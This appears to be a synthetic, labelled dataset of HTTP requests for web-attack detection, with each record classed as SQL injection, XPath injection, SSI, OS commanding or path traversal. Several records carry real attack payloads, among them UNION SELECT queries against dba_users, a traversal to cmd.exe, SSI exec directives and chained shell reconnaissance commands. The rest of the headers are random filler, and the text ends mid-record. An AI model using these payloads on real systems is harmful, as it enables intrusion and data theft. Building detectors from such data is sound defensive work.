UA-Pixels: 286x017
Via: HTTP/0.9 0.129.47.217:19015, HTTP/2.2 195.32.189.7:0, 1.5 www.piIriuf.js:824
Transfer-Encoding: 5ore; EErEntt=tRtocaD
Upgrade: urd/1.0
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47197
Start - Id: 39390
class: SSI
GET /Taoeu7oow/eD4Kb/zmkJez.dll?5C@H7ykul4r=gf3tgTdo7&SacceptUgwt=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&FXJautoexec039ad1l=iaursMttye&zewstiiA=5892950&mef=e%25-&dnxnrie=+d%3D+etc&s3nhehl=Nlrsoa99gt&Yntkciaboc51pu=nslrkEerumleeisby&canseoae3rTn=j9D6.ykP%40FT&JNkn=rb- HTTP/1.1
Host: 98.24.109.128
Connection: close
Accept: application/*, video/*
Accept-Charset: gb2312;q=0.5, x-mac-roman, euc-jp, euc-kr
Accept-Encoding: 
Accept-Language: tyyaiiEr-arh3yoel, Trdi-ysriwo, dmV-ms6;q=0.9, teh-notbnbc;q=0.9, ahetsdd2-dosrrS
Cache-Control: l6v=s
Client-ip: 247.66.9.211
Cookie: aco=Zec;ll=xlcamt];serhramintle=t)o;ii=rUSmz;ogrsa5egahrzL=710;gf4tnro=5yelpY3isb
Cookie2: $Version="42"
Date: Tue, 22 Nov 05 08:34:11 CET
ETag: "lDDdeICjGfQ3NK@NFBX"
Expect: bnehhbgf
From: 2taerbd@7tinee5s.fr
If-Modified-Since: Wed, 30 Nov 05 18:41:36 GMT
If-Unmodified-Since: Fri, 10 Feb 06 05:25:18 CET
If-Match: "cf-Z8KIMpuUV8qnZjsbD"
If-None-Match: *
If-Range: "gYPgOcd-KW77hXir"
Max-Forwards: 828
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: reenr ueer=altyt2
Authorization: NTLM eXJlSWNidHNhdXRzcmVyZU5zUmUxaDdyRWJFZWx3bm9rVGVseWJUdGll
Range: -7403,569103-
Referer: http://datag.org/eeer/emgn/paHpbw9o/oAo00.avi
TE: gzip,trailers,chunked
Trailer: Accept
User-Agent: nnepxlszdE1dcj
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: 0.2 124.162.206.142, 8te/4.0 www.to9hhxn.shtml, 8.2 www.ei5nemn.shtml
Transfer-Encoding: moig
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 546 www.raiagiki.htm "ohfiere5i" "Sun, 09 Jan 05 20:08:05 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39390
Start - Id: 44180
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.1
Host: www.m1giuuatin.org
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.6, x-mac-chinesetrad, x-mac-japanese;q=0.0, x-mac-chinesesimp;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 148.106.30.191
Cookie: saseo8isfndIrr=eL4GnRe7rN8;sTu2VrNT7A=uetnngstyebr;wancGtmp=12;tiHblnioE8=0
Cookie2: $Version="987"
Date: Wed, 12 Sep 07 12:36:33 CET
ETag: W/"M9dWmzaYsbHXIY4Lq7Am"
Expect: 100-continue
From: ulnbn@Ssrnr.st
If-Modified-Since: Wed, 14 Sep 05 11:17:45 GMT
If-Unmodified-Since: Mon, 27 Aug 07 01:54:37 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 18 Jan 10 21:48:57 GMT
Max-Forwards: 1
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Digest opaque="Henvik"
Range: 5-,-97,-5
Referer: /esila/dhiT.bin
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/1.5 (X11; U; Linux i586 3.8; tb-tq; rv:0.7.6) Gecko/11175182
UA-CPU: StrongARM
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: HTTP/6.8 www.oeAoDdn.jpg, 2.5 97.136.49.86
Transfer-Encoding: identity
Upgrade: llemvt/2.2, yAhrud/8.0, Cskdn/9.3
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 103.223.39.110
X-Serial-Number: 338223
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44180
Start - Id: 50114
class: XPathInjection
PUT /auWsHenc8o4mgwsn/hoeioq6nm667dle/nnV45rdbdUhSa1c/C1sIcelocationrimg_pxT/xg7FY2N/pagsoodtcsj6emnx/eQsIT5AlvFT2B_Rz6t/8UwZ51uIsko.hRHHXGzN/urKfYnaS.mspx? HTTP/1.0
Content-Length: 82
Content-Language: otoeJ,mr
Content-Encoding: identity
Content-Location: /nitt/l9pzs/nesmiens/5yCgaljf.png
Content-MD5: ZXNoN29zbmhkZW53ZW5pTw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 31 Jul 06 17:22:19 CET
Host: 6.36.10.241
Connection: keep-alive
Accept: text/*;q=0.9
Accept-Charset: x-mac-chinesesimp;q=0.3
Accept-Encoding: deflate, gzip;q=0.3, identity, identity
Accept-Language: sasyeilu-c3x;q=0.9
Client-ip: 75.230.107.180
Cookie: nd9a=8 or   1<  E8kil/nhea/ar/child::text()[position()=54]     or 5694='] | /* | /foo[bar=';3gNasV=qNkcHRo ehr;eeyevlxlbe=6ru;hB=1290;wet=WtiyMaseerbatiot;djbxnL=403067133
Date: Sat, 10 Jul 04 06:56:54 GMT
If-Modified-Since: Mon, 03 Jan 05 17:26:25 CET
If-None-Match: "X7xOyf6RqqE26cJ"
If-Range: Fri, 28 May 04 16:13:23 CET
Max-Forwards: 074
Pragma: no-cache
Proxy-Authorization: Basic ZXN5bmxhejphZXZld08=
Authorization: Digest opaque="thbdih"
Referer: /byehl0uc.js
Trailer: Date
User-Agent: dbeknwers (ceZ38lC)
UA-Color: color8
UA-Pixels: 250x417
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aufmbsAiabei=o7&e7isivpz=32&Oe67waox9yeea1d=soii&epihg=ezhSNJIflS3&cdeuy4sdoRfi=69

End - Id: 50114
Start - Id: 40751
class: SSI
PUT /ar/adylohleI4s/oHQfromX@YW/ghnZD8VZNmLYglRQdUGx/bo0nC9tw1i3ap/nyeoeoietrj/oodede4otnn9/mailibEu5wFTiframevbscriptG/ich9.php3? HTTP/1.0
Content-Length: 151
Content-Language: dn9ahg
Content-Encoding: identity
Content-Location: /10xie/Toonlnua.gif
Content-MD5: d0huSG5hZWhpcm9lcGJ0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 26 May 05 01:55:56 GMT
Host: www.hphutuy.gov
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-2022-jp
Accept-Encoding: identity;q=0.2, deflate, compress, compress;q=0.6, gzip;q=0.3
Accept-Language: *
Cache-Control: max-age=199
Client-ip: 57.138.29.237
Cookie: GBnUqo=j;Xfwv=oAt5;oPD9dO7=aewei-
Date: Sat, 26 Aug 06 22:51:10 GMT
ETag: "BgIhRrT-XK_XKHDxn"
Expect: eNay=ejiiueus;5h5utnem
If-Modified-Since: Sun, 04 Oct 09 04:14:03 GMT
If-Unmodified-Since: Sat, 04 Dec 04 02:15:14 CET
If-Match: "hqu7Ro2nNNkFVQkQ"
If-None-Match: *
If-Range: "BNjWyzlC55l@@SUV"
Max-Forwards: 26
Pragma: no-cache
Authorization: a5dgn oqirnd=ocAptm
Range: 30-86033,50297-483952,510771-833674
Referer: http://www.zsem.cz/Shqwc/dptlE2/ar9imma.sh
TE: trailers,gzip,trailers
User-Agent: l9CKD5R9Z http://www.nsawoe.cz
UA-CPU: MIPS
UA-Color: color16
Via: HTTP/3.0 www.tHne6t.shtml:620
Upgrade: etg/2.7
Warning: 515 255.26.146.194 "etiqarDie" 
----: ----------------------------------------------

fsUIkPn0HhtpassY=<!--#odbc   connect="sWt4nol,oo,atuwe"    statement="select    * from    lhoe7"-->&efseaeea=pcewsegmsda5c4enme

End - Id: 40751
Start - Id: 42528
class: SqlInjection
GET /KsSphGalCfZtdeleteu/pAPkIf/hoitrcnc5mt/vscriptFt76Sk/tl6/hGSrlMQRsXUIP-/uec/hd6ah0ae/4fx8Ny4Zc9bhSTx/mgOuF./dyfrv-Y5AK4m.dll?oq5evicsaSanuo=2570252&Beid1=chairs%27++UN%2F**%2FION+++SEL%2F**%2FECT+++athssvyar+++++FROM+dba_users++WHERE+++++yecrsjte+++++like+++%27%2525&EsloowEai=fHirfGzoO0x&iwb9li=jF%40zkFW&enBase=wOmbSrr1s5arnaet5e&iat=81944 HTTP/1.1
Host: www.seDvg.be
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, deflate;q=0.4, identity, gzip;q=0.8, identity
Accept-Language: fAf04ct-ur;q=0.8
Cache-Control: only-if-cached
Client-ip: 193.221.217.71
Cookie: nhtstaiEtrsalai=sWDx;rylepeena0wt=2034;Ghortbs=e2R
Cookie2: $Version="094"
Date: Wed, 20 Jun 07 07:33:32 GMT
ETag: W/"2W7s5-ENre8Dzaenr_N"
Expect: 100-continue
From: lwelhoow@zyxm39yja.net
If-Modified-Since: Sun, 27 Sep 09 17:55:52 UTC
If-Unmodified-Since: Fri, 12 Nov 04 08:02:17 GMT
If-Match: "TvaPEl6WzRDHh49DB6OI"
If-None-Match: *
If-Range: Sat, 30 Jan 10 13:28:22 CET
Max-Forwards: 07
MIME-Version: 4.3
Pragma: ol=Ret4eili
Proxy-Authorization: Digest nc=ABB8e3d4
Authorization: naiao P9E9e=cekn
Range: 6-,94342-9,9-42
Referer: http://3ndx.de/cukt.js
TE: trailers
Trailer: Via
User-Agent: Mozilla/9.2 (Machintosh; U; Mac OS X 8.8; nc-gt; rv:3.9.7) Gecko/92047964
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: riEn3/0.7 92.24.213.228, kFa/5.6 www.plsaese.js, 0.8 www.gn0enu.png
Transfer-Encoding: deflate
Upgrade: hdxl/4.1, ir1i9/2.4
Warning: 039 www.rscr.js "tEodeseiset5e5eLbAid" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42528
Start - Id: 42294
class: SqlInjection
GET /epCYFxQn4HO5m/wlibB.WdK/abQ/BED/f9Tnc/iN.mbvN7Gd@iqEljLnni/B4x/yjA3orl/vg0etcbinL/ansg.jpg?tkelg=%27++or+++++id+in++%28++select++++*+++++from++++++++user_db++%29&.D58XxRM.2V=9395146089 HTTP/1.0
Host: www.ieps9l5nti.be
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-2, x-mac-arabic, euc-kr, utf-8, x-mac-roman
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=656
Client-ip: 87.181.200.43
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="095"
Date: Sun, 31 Oct 04 04:56:29 UTC
ETag: W/"17F1n2q6q2So7mxf"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Thu, 13 Aug 09 17:58:44 CET
If-Unmodified-Since: Sun, 23 Nov 08 07:12:04 UTC
If-Match: "79N6weC8TiNHylJR"
If-None-Match: *
If-Range: Sun, 20 Apr 08 14:07:00 UTC
Max-Forwards: 544
MIME-Version: 4.6
Pragma: eih='6uK'
Proxy-Authorization: NTLM c2NTYTJ1bDV3emVlZXlUZWV0ZHJhZXR5ZHJiN2dlaWNvY2ZTaWhlZW9ybWNq
Authorization: geSL smaxehu=eLdtQ
Range: -568889,-588214
Referer: /o7smstu/Oapt/twaUcd/te7m2hhm/hgaopR.aspx
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/7.2 (compatible; MSIE 4.5; Unix; inbohtec; 8da4)
UA-CPU: 68000
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5338x078
Via: HTTP/8.4 www.h8eedaq1.tiff:5411, 1.9 www.ahdeanUe.gif:400
Transfer-Encoding: wtaZya; iEiNota=sh2ite
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 539 www.diea.jpeg "Aotyhee" "Sun, 01 Feb 09 21:46:05 GMT"
X-Forwarded-For: 41.19.144.81
X-Serial-Number: 61789071021088545
----: --------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42294
Start - Id: 48616
class: XPathInjection
POST /meta1optDsO-sUW/e24RGvbT/n0.oD3PKaTaV0F-t547.nsf? HTTP/1.1
Content-Length: 277
Content-Language: djEoaaaC,nrt2
Content-Encoding: identity
Content-Location: /adtS/eseciIne/teIaso.php4
Content-MD5: ZTFtc2h5ZWxlRWVvbXRzbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Jul 06 17:00:26 UTC
Last-Modified: Tue, 19 Dec 06 16:49:46 GMT
Host: www.aStdr.fr:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 101.123.157.55
Cookie: sso=alyZPpBUO;C.CAqdwTYq5=ujtm3eera;eteuso9ogaesls=y3ggtsd;yltqxT=gZ6a
Cookie2: $Version="07"
Date: Fri, 20 Jul 07 19:28:17 UTC
ETag: W/"mGiU0sGqdzcOhhW"
Expect: 100-continue
From: ewioailt@flio7hb.com
If-Modified-Since: Wed, 18 Jun 08 06:47:26 GMT
If-Unmodified-Since: Mon, 28 Nov 05 12:13:49 GMT
If-Match: "BYvSWUPhani0Q3YK"
If-None-Match: *
If-Range: Fri, 28 Mar 08 09:59:35 CET
Max-Forwards: 85
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: Basic c3hjcHU6ZWUyYWVz
Range: 3-574
Referer: /nqMsE7n/natsinh/eiNd.zip
TE: trailers,gzip;q=0.9,trailers
Trailer: Referer
User-Agent: Mozilla/7.1 (Machintosh; U; PPC Mac OS X 0.0; 3o-ea; rv:5.3.5) Gecko/19967062
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: fssdh/6.8 www.jmeetos.gif, y4STrI/4.2 26.62.232.149
Transfer-Encoding: deflate
Upgrade: 98segm/6.0, emke/7.4, V6urw/1.6, y7u/6.3, erasgo/2.6
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 3403720047412746
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

cUtztci5c6=(i < count(tcatid/child::text())   and    j  <  count(1ain/child::comment()) and k   <  count(b6/child::*)  )&Yt=oh&nn)[&smi=8'l@nn+&retap1e=rzeehujl0Eiotafti&ygmatenshteo=666971&sserorMsmkhusa=mjl5&drte=ts

End - Id: 48616
Start - Id: 44150
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 205.165.68.161:55822
Connection: keep-alive
Accept: video/quicktime, image/*, application/*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, gzip;q=0.7, deflate;q=0.3, deflate;q=0.8
Accept-Language: *
Cache-Control: uttx='4u'
Client-ip: 59.227.227.23
Cookie: 6lbe4=scopy telnetqg(
Cookie2: $Version="0"
Date: Mon, 14 Nov 05 20:41:08 CET
ETag: "5OcSw9L3pWv7hqIq7JUA"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Sat, 11 Aug 07 08:00:30 UTC
If-Unmodified-Since: Fri, 30 Apr 04 18:50:21 GMT
If-Match: "D.@porpLCF@3E-TB4"
If-None-Match: *
If-Range: Sun, 28 Nov 04 07:58:01 GMT
Max-Forwards: 4428
MIME-Version: 7.5
Pragma: l2='nndRc'
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=MD5
Range: 815-,644-20793
Referer: /t4n1t/deedr9.asp
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: Mozilla/0.3 (Machintosh; U; PPC 4.1; 8n-1w; rv:1.9.1) Gecko/63733781
UA-CPU: Sparc
UA-Disp: 616,3302,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: 3.3 74.6.233.37, FTP/4.3 205.130.142.7, tn3/0.6 www.re0pe.jpeg
Transfer-Encoding: gzip
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 461 www.cMmiov.shtml "nih5iohnfhs8ylysduaa" "Thu, 12 Feb 09 12:33:00 CET"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44150
Start - Id: 49007
class: XPathInjection
GET /ymruhsOixpc8supsv/nNoDc@q/exoe1hpa/uQiinres/7group byPJ1LHx/cwZwHYiKrmIdnvixdlom.swf?eLBob=sidp%27+++or+++++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28i++%2B++j++%2B++k+++%2B++++l+%2B1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++%27nuciaA%27+%3D+%27++ds1nt%27+++or&oosde2w5tir=%3At&s7lroentit=386047&Ataoneneriosiu=%25 HTTP/1.1
Host: www.wio3.ch:8044
Connection: close
Accept: image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 183.47.188.228
Cookie: rnli=p5i;21hnnOv=4access_log;rsOceUonbtr2wn=dhAleatunrmee8vr8;hiabeo=heAat5qlf;_3_d.YTA4eUj=8412101773;cttHvHn0frtn==wgete
Cookie2: $Version="13"
Date: Thu, 09 Feb 06 01:17:45 UTC
ETag: W/"A_OF1TsXBNTJNorCOij"
Expect: neesae=gssh
From: w6wr@nytn.it
If-Modified-Since: Thu, 23 Apr 09 18:17:43 UTC
If-Unmodified-Since: Tue, 28 Dec 04 19:48:16 CET
If-Match: "k@dnYl8d3xyUDeNHpV"
If-None-Match: "sQmejrSvS2GLgTu"
If-Range: "iZm_0vun_wVTYBE"
Max-Forwards: 773
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest nc=2FF0fE2f
Authorization: Basic dGxpd2VjOmF0YzgxY21u
Range: -31
Referer: http://eaeu.org/erepqus.gif
TE: deflate;q=0.5,gzip,deflate
Trailer: From
User-Agent: Mozilla/4.5 (compatible; MSIE 8.8; Unix; aHamhtn1; tl8e)
UA-CPU: 68000
UA-Disp: 787,994,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4125x649
Via: aLtol/2.6 58.30.64.42, FTP/6.5 157.99.50.217, inamh/2.4 www.syyaeseh.tiff
Transfer-Encoding: deflate
Upgrade: meeoe/8.2, nir2fe/4.3, eS7e/1.8, nerHu/7.3
Warning: 893 www.orci.jpg "9g1en4itrrimothb4" 
X-Forwarded-For: 85.135.62.221
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49007
Start - Id: 41859
class: SqlInjection
GET /hh9rsloayLirLas9i/m7/eit9/naUtR/4SC2Ds/iqQ2UP6FDkaW6Gz@uXJr.gif?ct5u3cryeaaq=aMey%27%2F**%2FUNION%2F**%2FSELECT%2F**%2Fhr%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2FmlSos%2F**%2Flike%2F**%2F%27%2525&asS4sd=nQhdw HTTP/1.0
Host: www.ntleUohne9.st:80
Connection: Nehe2n
Accept: image/*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: im4twd-e;q=0.2, Yn-Lo9e2;q=0.7, gnea-Fhaog, ntoes3-enfbe;q=0.2
Cache-Control: no-store
Client-ip: 124.36.76.191
Cookie: uhtpRHir=yswi]isr;iAsz9iBotptniwe=1eucfo9gitia;EWosi3ny6nZ=e7-E6Ztckz;noHh7cb8ctqa=58889;uttm8iihO=icTV1H
Cookie2: $Version="72"
Date: Wed, 05 Nov 08 16:11:55 GMT
ETag: "a2V9IycN6MWKRF29Nv"
Expect: hbnaeaon=kuEqf
From: hth8n7i@4gf4.de
If-Modified-Since: Thu, 22 Jun 06 12:09:20 UTC
If-Unmodified-Since: Sat, 17 Jul 04 03:06:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7325
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: 9e2te epmr=aedBepse
Authorization: Digest opaque="srShtes"
Range: -521,-331719
Referer: /yppA3N3i/Obili.doc
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: ineunaeibOai1Rsis8E
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5914x483
Via: 0.9 70.225.13.111
Transfer-Encoding: gzip
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 532 103.218.114.157 "eqF8dbfeC" "Sat, 29 Jan 05 05:14:55 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41859
Start - Id: 36348
class: PathTransversal
GET /tunull2E@adminjuZb.png?te2eeahi=0porelgqi2nien&zh7tg2bes=ecioelxt&hrblaNmsNea=s2m&nO8rT7eaadoTte=%2F%2C%2C%2C%2Feitp%2Fm5ss%2Fpasswd&juulmmntxt=1853431&hEiaaaehe1s1=4575 HTTP/1.0
Host: www.uonfdsaAAf.ch:8249
Connection: ttit6t
Accept: */*
Accept-Charset: iso-8859-3
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.0
Cache-Control: max-age=0
Client-ip: 238.204.79.45
Cookie: hlOtpsaewh7re57=1299271;gWmhUg=242398838;l8e9tehhiyhie=i~hsopt[a0d|ev;dFEQLlLAMk=ebtSntrq;1Z5Sncx23VeQ@=er+;lhqiGTh1r=r%8)ies
Cookie2: $Version="405"
Date: Thu, 24 Sep 09 08:22:02 UTC
ETag: "cfqnbPK5k4tKX2_HzErM"
Expect: yIdnea=sctmien
From: sleras@7i3heoin.uk
If-Modified-Since: Sat, 27 May 06 19:44:21 GMT
If-Unmodified-Since: Wed, 16 Jul 08 19:04:03 UTC
If-Match: "6vJ6UlDUoMRST.-QC0nY"
If-None-Match: "KMdxJUwz1IFH7_alRC_"
If-Range: *
Max-Forwards: 95
MIME-Version: 2.6
Pragma: Eo7rmatt=owzPeti
Proxy-Authorization: Basic YXVJbnM6ZWhpcjFndHU=
Authorization: NTLM YXN0aGM0YTh0aDgzaGlvdG1tNXBwZnJhdG50aDFzc2E=
Range: 75-618834,757-411,77394-267269
Referer: /tYad7t.mdb
TE: gzip,deflate,trailers
Trailer: From
User-Agent: a5i9m5Et (ennM4SfM; x.slrF5rHB; 7@Qgb43-@_; 3zwxjlkg)
UA-CPU: x86
UA-Disp: 7628,9010,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 636x8824
Via: 1.4 57.185.61.236, FTP/6.4 165.207.236.127, FTP/8.7 118.88.194.64
Transfer-Encoding: gzip
Warning: 201 www.dreo.png "soaIbe7zmO" 
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36348
Start - Id: 45941
class: PathTransversal
GET /Ycnfboohsnhsts/voG/Snrwinnt0nBBmrcprbS/aex-xIK/aQPvfj/idR5redtNa/sY2yzXoBk53e.jpg?uyr82urilisonns=cl0aamfitAen8&0ceaoat=it%3E&rretaI74tuedid=d+kee93tmpsslEysp&Taooraoop9fe=33440478&Rotteohnmn7ni1=ecn4mnetcati&woneixTrggoend=..%2F..%2F..%2FWINNT%2Fautoexec.bat&HGtYd=zB3%5Dedtmpe%28ttRdrs&dKw=ea%25 HTTP/1.0
Host: 4.17.159.79:8283
Connection: bsIphpt
Accept: audio/*, application/x-tar;q=0.0, image/gif
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: tvesrt-annhuyty;q=0.4, nlsh-tpkAe;q=0.5, bei-rhs;q=0.5, gocme-iNBocrsr
Cache-Control: max-age=07355
Client-ip: 81.34.102.44
Cookie: 2wHbody3UFd='doewyaoperl +T;renqlnhbAi=33169;tpeteeix8a=h8NaneareeadOe
Cookie2: $Version="0"
Date: Tue, 15 Jun 04 08:21:05 GMT
ETag: W/"XKbyuMD2voqLwMebLI4"
Expect: eT6euen=9eaNn9nm;meo5si=0tshnnor
From: ba5dren@nteitjeEal.cz
If-Modified-Since: Wed, 08 Feb 06 02:38:56 UTC
If-Unmodified-Since: Sat, 08 Jul 06 21:39:45 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Dec 08 01:00:32 UTC
Max-Forwards: 8810
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Hh8ljl hkHpI=asiyO
Referer: /gttrn/NonRs/1idun6/4eeni.nsf
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: hw9p/8.4.2.2
UA-Disp: 3135,8994,8
UA-OS: Mac OS X
Via: 4.7 189.244.119.166
Transfer-Encoding: telre
Upgrade: Hne/9.3, keht/9.7, eldt/7.3, tlenn/6.0
Warning: 398 www.smeahedb.tiff "s3nlja40" 
X-Serial-Number: 15666151508879935432
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45941
Start - Id: 40080
class: SSI
GET /45y9ftpQSr4kGZ/Wpjsps@J/NqFPe.__/Ubodytw/XRQ/KXTUo9Q2QEVMtFJ/qUlZXU/fTCWkmetaXiP@mB.jpg?erhf=%3C%21+++++%23%3C%21--%23exec++++cmd%3D%22id%22--%3E&ina=%2Btsz%29tIt&Y0QY0P9dperlwhere=132218 HTTP/1.0
Host: www.toto5o.ch
Connection: mnacnd
Accept: application/postscript;q=0.9, text/html
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, compress, gzip, compress, compress
Accept-Language: *
Cache-Control: min-fresh=324
Client-ip: 53.190.46.19
Cookie: eiA=43;LAguYcBQ9Yib=4967007
Cookie2: $Version="080"
Date: Sun, 31 Aug 08 18:14:10 CET
ETag: "zpw2OwFuO-yaWgtlF9eB"
Expect: 9fca=ulatc;2dTfm8
From: hbdwf2hh@oEzag3e7.de
If-Modified-Since: Tue, 13 May 08 04:56:28 CET
If-Unmodified-Since: Sun, 11 Mar 07 07:42:25 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Mar 06 17:44:52 GMT
Max-Forwards: 479
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: Ezs6u annenrv=oIrt1oH
Range: 4-,3-,-4
Referer: http://www.lsfptsPa.be/netbshaz/5stong.exe
TE: chunked,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.3 (Machintosh; U; PPC Mac OS X 8.2; es-in; rv:5.4.3) Gecko/73448348
UA-CPU: PowerPC
UA-Disp: 3467,475,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0944x596
Via: HTTP/9.3 249.51.212.194, FTP/5.4 www.hf3oyro.html
Transfer-Encoding: Redce
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 187 www.s2nfht.shtml "Idhcekl" 
X-Forwarded-For: 133.223.4.65
X-Serial-Number: 9018401167222078
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40080
Start - Id: 43329
class: OsCommanding
GET /BfZrmW/QtpeehiEhfnfOeag/oxp_69fwimgqp/1Pj9/ieyeo9easxbaIdLrfhr/G1JBpWo/kI06ya/xmlstdinfGZH/imWe1t.tiff?edriePayn0oe8us=667504&aWrnodciof=tnegsleE6iva&IdnsystOhre=%3Becho+++%3B+w+++++%3B+++uname+++-a%3B+++++id&netcat.KYls-XGmOSV=tuUqZzjI HTTP/1.1
Host: 157.108.22.227
Connection: close
Accept: text/*;q=0.8, video/*;q=0.2
Accept-Charset: x-mac-icelandic
Accept-Encoding: *
Accept-Language: rn-stdnhe;q=0.1
Cache-Control: no-store
Client-ip: 39.1.82.102
Cookie: xsdajntar=375381;dt0Eda=ads;GAaiqCniv=584
Cookie2: $Version="66"
Date: Sun, 10 Jul 05 03:00:42 GMT
ETag: W/"y4mXqvzLGmUzprT"
Expect: 100-continue
From: u2ou5He@loliohda.uk
If-Modified-Since: Sat, 29 Sep 07 11:14:04 UTC
If-Unmodified-Since: Mon, 28 Jan 08 14:17:43 CET
If-Match: "rvwbc0oViTX.ORIfY37"
If-None-Match: *
If-Range: Fri, 27 Nov 09 09:39:35 UTC
Max-Forwards: 0
MIME-Version: 7.9
